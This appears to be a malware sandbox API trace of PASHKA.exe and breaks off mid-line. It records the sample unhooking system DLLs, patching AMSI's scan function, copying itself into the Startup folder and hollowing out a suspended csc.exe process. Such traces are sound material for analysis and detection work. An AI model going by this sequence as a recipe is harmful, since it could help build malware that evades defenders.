# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Jan 8 2020 21:00:13 # Log Creation Date: 09.01.2020 07:17:46.529 Process: id = "1" image_name = "pashka.exe" filename = "c:\\users\\fd1hvy\\desktop\\pashka.exe" page_root = "0x9a4c000" os_pid = "0xfc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x740" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x324 [0037.098] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0037.098] _set_app_type (_Type=0x2) [0037.098] _set_fmode (_Mode=16384) returned 0x0 [0037.098] __p__commode () returned 0x742f96f8 [0037.098] _crt_atexit (_Function=0xe3457b) returned 0 [0037.098] _configure_wide_argv (mode=0x1) returned 0x0 [0037.098] RtlInitializeSListHead (in: ListHead=0xe373e0 | out: ListHead=0xe373e0) [0037.098] _controlfp_s (in: _CurrentState=0x0, _NewValue=0x10000, _Mask=0x30000 | out: _CurrentState=0x0) returned 0x0 [0037.098] _configthreadlocale () returned 0x2 [0037.099] _initialize_wide_environment () returned 0 [0037.104] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe344f1) returned 0x0 [0037.105] _set_new_mode () returned 0x0 [0037.105] GetStartupInfoW (in: lpStartupInfo=0xf4fcd0 | out: lpStartupInfo=0xf4fcd0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0037.105] _get_wide_winmain_command_line () returned="" [0037.105] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="CHIMERA") returned 0x0 [0037.105] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="CHIMERA") returned 0xe4 [0037.105] GetCurrentProcess () returned 0xffffffff [0037.105] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0037.105] K32GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77390000, lpmodinfo=0xf4f5b0, cb=0xc | out: lpmodinfo=0xf4f5b0*(lpBaseOfDll=0x77390000, SizeOfImage=0x18e000, EntryPoint=0x0)) returned 1 [0037.106] malloc (_Size=0x20) returned 0x1dab78 [0037.106] malloc (_Size=0x20) returned 0x1dac40 [0037.106] CreateFileA (lpFileName="c:\\windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0037.106] CreateFileMappingA (hFile=0xe8, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xec [0037.106] MapViewOfFile (hFileMappingObject=0xec, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1300000 [0037.106] VirtualProtect (in: lpAddress=0x77391000, dwSize=0x112034, flNewProtect=0x40, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x20) returned 1 [0037.213] VirtualProtect (in: lpAddress=0x77391000, dwSize=0x112034, flNewProtect=0x20, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x40) returned 1 [0037.335] CloseHandle (hObject=0xffffffff) returned 1 [0037.335] CloseHandle (hObject=0xe8) returned 1 [0037.335] CloseHandle (hObject=0xec) returned 1 [0037.335] FreeLibrary (hLibModule=0x77390000) returned 1 [0037.335] free (_Block=0x1dac40) [0037.335] free (_Block=0x1dab78) [0037.335] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0037.335] K32GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74030000, lpmodinfo=0xf4f5b0, cb=0xc | out: lpmodinfo=0xf4f5b0*(lpBaseOfDll=0x74030000, SizeOfImage=0xd0000, EntryPoint=0x740406a0)) returned 1 [0037.335] malloc (_Size=0x20) returned 0x1dab78 [0037.335] malloc (_Size=0x30) returned 0x1df2c0 [0037.335] CreateFileA (lpFileName="c:\\windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0037.336] CreateFileMappingA (hFile=0xec, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe8 [0037.336] MapViewOfFile (hFileMappingObject=0xe8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1490000 [0037.336] VirtualProtect (in: lpAddress=0x74040000, dwSize=0x5f9d6, flNewProtect=0x40, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x20) returned 1 [0037.396] VirtualProtect (in: lpAddress=0x74040000, dwSize=0x5f9d6, flNewProtect=0x20, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x40) returned 1 [0037.447] CloseHandle (hObject=0xffffffff) returned 1 [0037.449] CloseHandle (hObject=0xec) returned 1 [0037.450] CloseHandle (hObject=0xe8) returned 1 [0037.452] FreeLibrary (hLibModule=0x74030000) returned 1 [0037.452] free (_Block=0x1df2c0) [0037.452] free (_Block=0x1dab78) [0037.454] GetModuleHandleA (lpModuleName="KernelBase.dll") returned 0x77180000 [0037.467] K32GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77180000, lpmodinfo=0xf4f5b0, cb=0xc | out: lpmodinfo=0xf4f5b0*(lpBaseOfDll=0x77180000, SizeOfImage=0x1c2000, EntryPoint=0x7726ff30)) returned 1 [0037.467] malloc (_Size=0x20) returned 0x1dab78 [0037.467] malloc (_Size=0x30) returned 0x1df2c0 [0037.468] CreateFileA (lpFileName="c:\\windows\\system32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0037.470] CreateFileMappingA (hFile=0xe8, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xec [0037.472] MapViewOfFile (hFileMappingObject=0xec, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1560000 [0037.474] VirtualProtect (in: lpAddress=0x77181000, dwSize=0x18f586, flNewProtect=0x40, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x20) returned 1 [0037.660] VirtualProtect (in: lpAddress=0x77181000, dwSize=0x18f586, flNewProtect=0x20, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x40) returned 1 [0037.794] CloseHandle (hObject=0xffffffff) returned 1 [0037.796] CloseHandle (hObject=0xe8) returned 1 [0037.798] CloseHandle (hObject=0xec) returned 1 [0037.799] FreeLibrary (hLibModule=0x77180000) returned 1 [0037.799] free (_Block=0x1df2c0) [0037.799] free (_Block=0x1dab78) [0037.801] GetModuleHandleA (lpModuleName="sechost.dll") returned 0x73f20000 [0037.803] K32GetModuleInformation (in: hProcess=0xffffffff, hModule=0x73f20000, lpmodinfo=0xf4f5b0, cb=0xc | out: lpmodinfo=0xf4f5b0*(lpBaseOfDll=0x73f20000, SizeOfImage=0x41000, EntryPoint=0x73f33400)) returned 1 [0037.803] malloc (_Size=0x20) returned 0x1dab78 [0037.803] malloc (_Size=0x20) returned 0x1dac40 [0037.804] CreateFileA (lpFileName="c:\\windows\\system32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0037.806] CreateFileMappingA (hFile=0xec, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe8 [0037.808] MapViewOfFile (hFileMappingObject=0xe8, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xf50000 [0037.809] VirtualProtect (in: lpAddress=0x73f21000, dwSize=0x34f31, flNewProtect=0x40, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x20) returned 1 [0037.875] VirtualProtect (in: lpAddress=0x73f21000, dwSize=0x34f31, flNewProtect=0x20, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x40) returned 1 [0037.887] CloseHandle (hObject=0xffffffff) returned 1 [0037.888] CloseHandle (hObject=0xec) returned 1 [0037.890] CloseHandle (hObject=0xe8) returned 1 [0037.892] FreeLibrary (hLibModule=0x73f20000) returned 1 [0037.892] free (_Block=0x1dac40) [0037.892] free (_Block=0x1dab78) [0037.893] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x745c0000 [0037.895] K32GetModuleInformation (in: hProcess=0xffffffff, hModule=0x745c0000, lpmodinfo=0xf4f5b0, cb=0xc | out: lpmodinfo=0xf4f5b0*(lpBaseOfDll=0x745c0000, SizeOfImage=0x77000, EntryPoint=0x745de5b0)) returned 1 [0037.895] malloc (_Size=0x20) returned 0x1dab78 [0037.895] malloc (_Size=0x30) returned 0x1df410 [0037.897] CreateFileA (lpFileName="c:\\windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0037.899] CreateFileMappingA (hFile=0xe8, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xec [0037.900] MapViewOfFile (hFileMappingObject=0xec, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1730000 [0037.902] VirtualProtect (in: lpAddress=0x745c1000, dwSize=0x654f9, flNewProtect=0x40, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x20) returned 1 [0037.930] VirtualProtect (in: lpAddress=0x745c1000, dwSize=0x654f9, flNewProtect=0x20, lpflOldProtect=0xf4f5ec | out: lpflOldProtect=0xf4f5ec*=0x40) returned 1 [0037.951] CloseHandle (hObject=0xffffffff) returned 1 [0037.952] CloseHandle (hObject=0xe8) returned 1 [0037.966] CloseHandle (hObject=0xec) returned 1 [0037.967] FreeLibrary (hLibModule=0x745c0000) returned 1 [0037.967] free (_Block=0x1df410) [0037.967] free (_Block=0x1dab78) [0037.969] LoadLibraryA (lpLibFileName="amsi") returned 0x73c60000 [0038.997] GetProcAddress (hModule=0x73c60000, lpProcName="AmsiScanBuffer") returned 0x73c640b0 [0038.998] VirtualProtect (in: lpAddress=0x73c640cb, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xf4f670 | out: lpflOldProtect=0xf4f670*=0x20) returned 1 [0039.001] VirtualProtect (in: lpAddress=0x73c640cb, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xf4f66c | out: lpflOldProtect=0xf4f66c*=0x40) returned 1 [0039.006] GetUserNameA (in: lpBuffer=0xf4f7e8, pcbBuffer=0xf4f6b0 | out: lpBuffer="FD1HVy", pcbBuffer=0xf4f6b0) returned 1 [0039.014] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xf4f7e8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pashka.exe")) returned 0x22 [0039.015] _except_handler4_common () [0039.015] _except_handler4_common () [0039.017] GetUserNameA (in: lpBuffer=0xf4f9f8, pcbBuffer=0xf4f788 | out: lpBuffer="FD1HVy", pcbBuffer=0xf4f788) returned 1 [0039.025] malloc (_Size=0x40) returned 0x1eb4f8 [0039.025] malloc (_Size=0x40) returned 0x1eb540 [0039.025] free (_Block=0x1eb4f8) [0039.026] malloc (_Size=0x50) returned 0x1eb588 [0039.026] free (_Block=0x1eb540) [0039.027] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xf4f8f0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pashka.exe")) returned 0x22 [0039.027] malloc (_Size=0x30) returned 0x1df2f8 [0039.027] free (_Block=0x1df2f8) [0039.027] malloc (_Size=0x50) returned 0x1eb5e0 [0039.027] malloc (_Size=0x77) returned 0x1eb4f8 [0039.027] free (_Block=0x1eb5e0) [0039.027] malloc (_Size=0x30) returned 0x1df2f8 [0039.028] malloc (_Size=0x20) returned 0x1ea760 [0039.028] free (_Block=0x1df2f8) [0039.029] CopyFileA (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pashka.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\pashka.exe"), bFailIfExists=1) returned 1 [0039.261] malloc (_Size=0x30) returned 0x1df330 [0039.261] malloc (_Size=0x30) returned 0x1df368 [0039.261] free (_Block=0x1df330) [0039.261] _time64 (in: _Time=0x0 | out: _Time=0x0) returned 0x5e16d3c0 [0039.261] srand (_Seed=0x5e16d3c0) [0039.261] rand () returned 29025 [0039.261] malloc (_Size=0x40) returned 0x1ee330 [0039.261] malloc (_Size=0x40) returned 0x1ee918 [0039.261] malloc (_Size=0x40) returned 0x1ee7b0 [0039.262] free (_Block=0x1ee918) [0039.262] malloc (_Size=0x70) returned 0x1eb030 [0039.262] free (_Block=0x1ee7b0) [0039.262] wcscpy_s (in: _Destination=0xf4faf8, _SizeInWords=0x100, _Source="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" | out: _Destination="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe") returned 0x0 [0039.263] FindResourceA (hModule=0x0, lpName=0x65, lpType=0xa) returned 0xe380a0 [0039.265] SizeofResource (hModule=0x0, hResInfo=0xe380a0) returned 0xc000 [0039.267] LoadResource (hModule=0x0, hResInfo=0xe380a0) returned 0xe380d0 [0039.269] LockResource (hResData=0xe380d0) returned 0xe380d0 [0039.270] FindResourceA (hModule=0x0, lpName=0x66, lpType=0xa) returned 0xe380b0 [0039.272] SizeofResource (hModule=0x0, hResInfo=0xe380b0) returned 0x200 [0039.273] LoadResource (hModule=0x0, hResInfo=0xe380b0) returned 0xe440d0 [0039.275] LockResource (hResData=0xe440d0) returned 0xe440d0 [0039.276] VirtualProtect (in: lpAddress=0xe380d0, dwSize=0xc000, flNewProtect=0x40, lpflOldProtect=0xf4f78c | out: lpflOldProtect=0xf4f78c*=0x2) returned 1 [0039.281] VirtualProtect (in: lpAddress=0xe380d0, dwSize=0xc000, flNewProtect=0x2, lpflOldProtect=0xf4f7b4 | out: lpflOldProtect=0xf4f7b4*=0x40) returned 1 [0039.283] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xf4f620*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf4f610 | out: lpCommandLine="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", lpProcessInformation=0xf4f610*(hProcess=0x14c, hThread=0x148, dwProcessId=0xde0, dwThreadId=0xaac)) returned 1 [0039.635] VirtualAlloc (lpAddress=0x0, dwSize=0xc000, flAllocationType=0x3000, flProtect=0x4) returned 0x100000 [0039.649] NtGetContextThread (in: ThreadHandle=0x148, Context=0xf4f338 | out: Context=0xf4f338*(ContextFlags=0x10007, Dr0=0xa3, Dr1=0x36, Dr2=0xdd, Dr3=0x94, Dr6=0xe5, Dr7=0x18, FloatSave.ControlWord=0xa8, FloatSave.StatusWord=0x67, FloatSave.TagWord=0x86, FloatSave.ErrorOffset=0xa7, FloatSave.ErrorSelector=0xff, FloatSave.DataOffset=0xfd, FloatSave.DataSelector=0xe9, FloatSave.RegisterArea=([0]=0x1b, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x1f, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x93, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x45, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0xf4, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x19, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x7d, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x43, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xda, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xac, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0xcf, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x4f, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x40, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0xc0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x65, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x41, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xc5, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x7a, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xcc, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x39, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x3c, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x5125000, Edx=0x0, Ecx=0x0, Eax=0xd3cee0, Ebp=0x0, Eip=0x77404210, SegCs=0x23, EFlags=0x202, Esp=0x53ffc10, SegSs=0x2b, ExtendedRegisters=([0]=0x57, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x3a, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x38, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x2b, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x64, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x10, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x56, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x4e, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xcb, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xae, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x3d, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb3, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x5e, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x58, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x20, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0xd3, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x7, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x8, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x8e, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x2a, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0xf5, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x48, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0xbf, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x75, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0xfc, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x26, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x9d, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0xb2, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x77, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x35, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x8f, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0xd5, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x2c, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x2f, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x15, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0xef, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x4c, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0xce, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xa1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x9f, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x89, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x5a, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x29, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x9c, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x1d, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x72, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x37, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x66, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x98, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0xe6, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x68, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x42, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x8c, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x52, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x28, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0xc, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0xdc, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x3f, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0xa9, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x84, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x9, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0xc7, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x6, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x4d, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x51, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0xdf, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0xf8, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x73, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0xb9, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0xc3, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0xc6, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x71, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x46, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x6b, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x6d, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0xca, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x8d, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x31, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0xd1, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0xd2, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0xe, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x9b, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0xa2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x79, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x3, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x12, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0xb0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x6a, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x50, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x92, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0xc8, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0xfa, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0xf, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x60, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x22, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0xaf, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x5, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0xf2, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x7e, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0xd7, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x80, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x99, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x3b, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x95, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0xbe, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x2d, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0xb8, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0xe7, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x5c, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x30, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x88, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x54, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x81, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x11, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x82, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0xd6, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0xd0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0xad, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0xd, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x9e, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0xa5, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0xfe, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x7c, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0xd9, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0xb6, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0039.654] NtReadVirtualMemory (in: ProcessHandle=0x14c, BaseAddress=0x5125008, Buffer=0xf4f60c, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0xf4f60c*, NumberOfBytesRead=0x0) returned 0x0 [0039.656] VirtualAllocEx (hProcess=0x14c, lpAddress=0x400000, dwSize=0x12000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0039.663] NtWriteVirtualMemory (in: ProcessHandle=0x14c, BaseAddress=0x400000, Buffer=0x100000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x100000*, NumberOfBytesWritten=0x0) returned 0x0 [0039.669] NtWriteVirtualMemory (in: ProcessHandle=0x14c, BaseAddress=0x402000, Buffer=0x100200*, NumberOfBytesToWrite=0xb400, NumberOfBytesWritten=0x0 | out: Buffer=0x100200*, NumberOfBytesWritten=0x0) returned 0x0 [0040.139] NtWriteVirtualMemory (in: ProcessHandle=0x14c, BaseAddress=0x40e000, Buffer=0x10b600*, NumberOfBytesToWrite=0x800, NumberOfBytesWritten=0x0 | out: Buffer=0x10b600*, NumberOfBytesWritten=0x0) returned 0x0 [0040.195] NtWriteVirtualMemory (in: ProcessHandle=0x14c, BaseAddress=0x410000, Buffer=0x10be00*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x10be00*, NumberOfBytesWritten=0x0) returned 0x0 [0040.201] NtWriteVirtualMemory (in: 